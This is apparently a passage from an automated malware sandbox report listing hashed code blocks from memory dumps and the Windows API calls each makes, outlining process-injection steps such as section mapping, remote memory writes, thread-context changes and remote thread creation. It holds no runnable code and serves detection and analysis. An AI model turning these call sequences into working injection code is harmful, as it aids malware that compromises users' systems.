  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 146
  • API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen
  • String ID: (
  • API String ID: 3095632906-3887548279
  • Opcode ID: 94967647f14b4038a7c87927226b8276d3bfedb75998008a5caceb4601cf75e0
  • Instruction ID: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
  • Opcode Fuzzy Hash: 73318B4607CED746D12B5C8204727A7A295EFE2F44DACF33974217D6990F603B2A5B84
  • Instruction Fuzzy Hash: f5bb30c678593c05d87a43fc69960765f2e7079c3ddc3d57f5e3f9dd4a0c7e7a
APIs
  • StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
  • lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
  • RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
  • lstrlenW.KERNEL32 ref: 01B32ECC
  • RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
  • RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
  • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
  • lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
  • HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B3464F: lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
    • Part of subcall function 01B3464F: lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
    • Part of subcall function 01B3464F: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
    • Part of subcall function 01B3464F: wsprintfW.USER32 ref: 01B3469A
    • Part of subcall function 01B34172: lstrlenW.KERNEL32(01B32F7A,01B342EB,00000000,?,?,01B32F7A,00000000), ref: 01B3417B
    • Part of subcall function 01B34172: memcpy.NTDLL(00000000,01B32F7A,00000000,00000000,01B342ED,?,?,01B32F7A,00000000), ref: 01B341A5
    • Part of subcall function 01B34172: memset.NTDLL ref: 01B341B9
  • lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
    • Part of subcall function 01B32B25: SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
    • Part of subcall function 01B32B25: CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
    • Part of subcall function 01B32B25: FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
    • Part of subcall function 01B32B25: GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
  • lstrcpy.KERNEL32(?,?), ref: 01B32FEE
  • RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
  • RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
  • RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
  • RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
  • RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
  • RegCloseKey.ADVAPI32(?), ref: 01B330BA
  • RegCloseKey.ADVAPI32(?), ref: 01B330C3
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
  • RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 50136b8a9ad019f77738c7d2695a80d9cfa58a10d54e3dd229c6b48dc4baf302
  • Instruction ID: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
  • Opcode Fuzzy Hash: 2ED0A7C10F5D4412085E48CC143A5A300CAEC2171527BAE2F3439681A14B52311D0EC9
  • Instruction Fuzzy Hash: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 01B314D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,01B38000,?,?,01B3180F,00000000,?,01B37494), ref: 01B314FF
  • FindWindowA.USER32(01B38640,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31520
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: 74eade3f190c4a0697bbd14a78cdb86cd2f7d3a49057973da75d73adb6c5ad00
  • Instruction ID: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
  • Opcode Fuzzy Hash: 88E05C50053DC7C59834A89704E0BB3F141FE51306AAC6B28363824614AF583E275B44
  • Instruction Fuzzy Hash: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
APIs
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324CE
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
  • CloseHandle.KERNEL32(01B315DA), ref: 01B324C6
  • CloseHandle.KERNEL32(?), ref: 01B324E0
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324E8
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
